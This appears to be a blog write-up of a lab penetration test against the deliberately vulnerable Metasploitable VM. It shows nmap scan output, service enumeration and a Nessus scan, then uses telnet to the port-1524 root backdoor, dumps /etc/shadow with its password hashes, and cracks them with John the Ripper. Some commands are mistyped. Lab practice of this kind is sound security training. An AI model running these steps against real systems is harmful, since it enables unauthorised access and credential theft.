SF:x20Max-Forwards::\x20command\x20not\x20found\nroot@metasploitable:/#\x2
SF:0root@metasploitable:/#\x20bash:\x20Content-Length::\x20command\x20not\
SF:x20found\nroot@metasploitable:/#\x20root@metasploitable:/#\x20bash:\x20
SF:syntax\x20error\x20near\x20unexpected\x20token\x20`newline'\nroot@metas
SF:ploitable:/#\x20root@metasploitable:/#\x20bash:\x20Accept::\x20command\
SF:x20not\x20found\nroot@metasploitable:/#\x20root@metasploitable:/#\x20ro
SF:ot@metasploitable:/#\x20root@m");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8787-TCP:V=5.61TEST4%I=7%D=11/17%Time=50A7B17C%P=i686-pc-linux-gnu%
SF:r(GenericLines,3AB,"\0\0\0\x03\x04\x08F\0\0\x03\xa0\x04\x08o:\x16DRb::D
SF:RbConnError\x07:\x07bt\[\x17\"//usr/lib/ruby/1\.8/drb/drb\.rb:573:in\x2
SF:0`load'\"7/usr/lib/ruby/1\.8/drb/drb\.rb:612:in\x20`recv_request'\"7/us
SF:r/lib/ruby/1\.8/drb/drb\.rb:911:in\x20`recv_request'\"</usr/lib/ruby/1\
SF:.8/drb/drb\.rb:1530:in\x20`init_with_client'\"9/usr/lib/ruby/1\.8/drb/d
SF:rb\.rb:1542:in\x20`setup_message'\"3/usr/lib/ruby/1\.8/drb/drb\.rb:1494
SF::in\x20`perform'\"5/usr/lib/ruby/1\.8/drb/drb\.rb:1589:in\x20`main_loop
SF:'\"0/usr/lib/ruby/1\.8/drb/drb\.rb:1585:in\x20`loop'\"5/usr/lib/ruby/1\
SF:.8/drb/drb\.rb:1585:in\x20`main_loop'\"1/usr/lib/ruby/1\.8/drb/drb\.rb:
SF:1581:in\x20`start'\"5/usr/lib/ruby/1\.8/drb/drb\.rb:1581:in\x20`main_lo
SF:op'\"//usr/lib/ruby/1\.8/drb/drb\.rb:1430:in\x20`run'\"1/usr/lib/ruby/1
SF:\.8/drb/drb\.rb:1427:in\x20`start'\"//usr/lib/ruby/1\.8/drb/drb\.rb:142
SF:7:in\x20`run'\"6/usr/lib/ruby/1\.8/drb/drb\.rb:1347:in\x20`initialize'\
SF:"//usr/lib/ruby/1\.8/drb/drb\.rb:1627:in\x20`new'\"9/usr/lib/ruby/1\.8/
SF:drb/drb\.rb:1627:in\x20`start_service'\"%/usr/sbin/druby_timeserver\.")
SF:%r(GetRequest,3AC,"\0\0\0\x03\x04\x08F\0\0\x03\xa1\x04\x08o:\x16DRb::DR
SF:bConnError\x07:\x07bt\[\x17\"//usr/lib/ruby/1\.8/drb/drb\.rb:573:in\x20
SF:`load'\"7/usr/lib/ruby/1\.8/drb/drb\.rb:612:in\x20`recv_request'\"7/usr
SF:/lib/ruby/1\.8/drb/drb\.rb:911:in\x20`recv_request'\"</usr/lib/ruby/1\.
SF:8/drb/drb\.rb:1530:in\x20`init_with_client'\"9/usr/lib/ruby/1\.8/drb/dr
SF:b\.rb:1542:in\x20`setup_message'\"3/usr/lib/ruby/1\.8/drb/drb\.rb:1494:
SF:in\x20`perform'\"5/usr/lib/ruby/1\.8/drb/drb\.rb:1589:in\x20`main_loop'
SF:\"0/usr/lib/ruby/1\.8/drb/drb\.rb:1585:in\x20`loop'\"5/usr/lib/ruby/1\.
SF:8/drb/drb\.rb:1585:in\x20`main_loop'\"1/usr/lib/ruby/1\.8/drb/drb\.rb:1
SF:581:in\x20`start'\"5/usr/lib/ruby/1\.8/drb/drb\.rb:1581:in\x20`main_loo
SF:p'\"//usr/lib/ruby/1\.8/drb/drb\.rb:1430:in\x20`run'\"1/usr/lib/ruby/1\
SF:.8/drb/drb\.rb:1427:in\x20`start'\"//usr/lib/ruby/1\.8/drb/drb\.rb:1427
SF::in\x20`run'\"6/usr/lib/ruby/1\.8/drb/drb\.rb:1347:in\x20`initialize'\"
SF://usr/lib/ruby/1\.8/drb/drb\.rb:1627:in\x20`new'\"9/usr/lib/ruby/1\.8/d
SF:rb/drb\.rb:1627:in\x20`start_service'\"%/usr/sbin/druby_timeserver\.");
MAC Address: 00:0C:29:80:7F:B6 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6
OS details: Linux 2.6.9 - 2.6.31
Uptime guess: 0.011 days (since Sat Nov 17 22:34:00 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=195 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:kernel
Host script results:
| nbstat:
| NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| Names
| METASPLOITABLE<00> Flags: <unique><active>
| METASPLOITABLE<03> Flags: <unique><active>
| METASPLOITABLE<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP
|_ System time: 2012-11-17 22:49:01 UTC-5
TRACEROUTE
HOP RTT ADDRESS
1 3.82 ms 192.168.249.129
NSE: Script Post-scanning.
Initiating NSE at 22:49
Completed NSE at 22:49, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 170.90 seconds
Raw packets sent: 65555 (2.885MB) | Rcvd: 65551 (2.623MB)
2. Service enumeration
#nmap -sV 192.168.249.129
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-11-17 22:51 WIT
Nmap scan report for 192.168.249.129
Host is up (0.00038s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind (rpcbind V2) 2 (rpc #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login
514/tcp open tcpwrapped
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open http Apache httpd 2.2.3
2049/tcp open nfs (nfs V2-4) 2-4 (rpc #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc Unreal ircd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:80:7F:B6 (VMware)
Service Info: Hosts: metasploitable.localdomain, localhost, www.http.com, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:kernel
3. Vulnerable assasment
> Now we used exploit-db for looking vulnerable
#cd /pentest/exploits/exploitdb/
#./searchploit (input version here)
>Here i try looking but couldn't find vulnerable, so i used nessus
go to directory of nessus then run
#/etc/init.d/nessud start
> open browser and type https://bt:8834/ then login
next step, choose scan, and add scan then input
Name : (required)
Type : (required)
Policy : (required)
Scan target : (required)
target file : (options/no required)
look pict
then press launch scan and wait a minute
> look report
there have Rogue shell backdoor detection, that means this system have backdoor, now click rogue shell backdoor and look port of backdoor
> Here we have port of backdoor, so next step is exploit
4. Exploit
> this step is exploit, because we have know is the system of metasploitable have backdoor, so we exploit used the backdoor via port
#telnet 192.168.249.129 1524
here I have entered into the metasploiatble's system,
now we want know how much user on this system
#cat etc/shadow/
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
sync:*:14684:0:99999:7:::
games:*:14684:0:99999:7:::
man:*:14684:0:99999:7:::
lp:*:14684:0:99999:7:::
mail:*:14684:0:99999:7:::
news:*:14684:0:99999:7:::
uucp:*:14684:0:99999:7:::
proxy:*:14684:0:99999:7:::
www-data:*:14684:0:99999:7:::
backup:*:14684:0:99999:7:::
list:*:14684:0:99999:7:::
irc:*:14684:0:99999:7:::
gnats:*:14684:0:99999:7:::
nobody:*:14684:0:99999:7:::
libuuid:!:14684:0:99999:7:::
dhcp:*:14684:0:99999:7:::
syslog:*:14684:0:99999:7:::
klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
sshd:*:14684:0:99999:7:::
msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::
bind:*:14685:0:99999:7:::
postfix:*:14685:0:99999:7:::
ftp:*:14685:0:99999:7:::
postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::
mysql:!:14685:0:99999:7:::
tomcat55:*:14691:0:99999:7:::
distccd:*:14698:0:99999:7:::
user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
telnetd:*:14715:0:99999:7:::
proftpd:!:14727:0:99999:7:::
statd:*:15474:0:99999:7:::
snmp:*:15480:0:99999:7:::
copy this shadow and make vulnerable.txt
> next step used john for look how user on this system
#cd /pentest/passwords/john/
#./john /root/vulnerable.txt
Finish :)
Subscribe to:
Posts (Atom)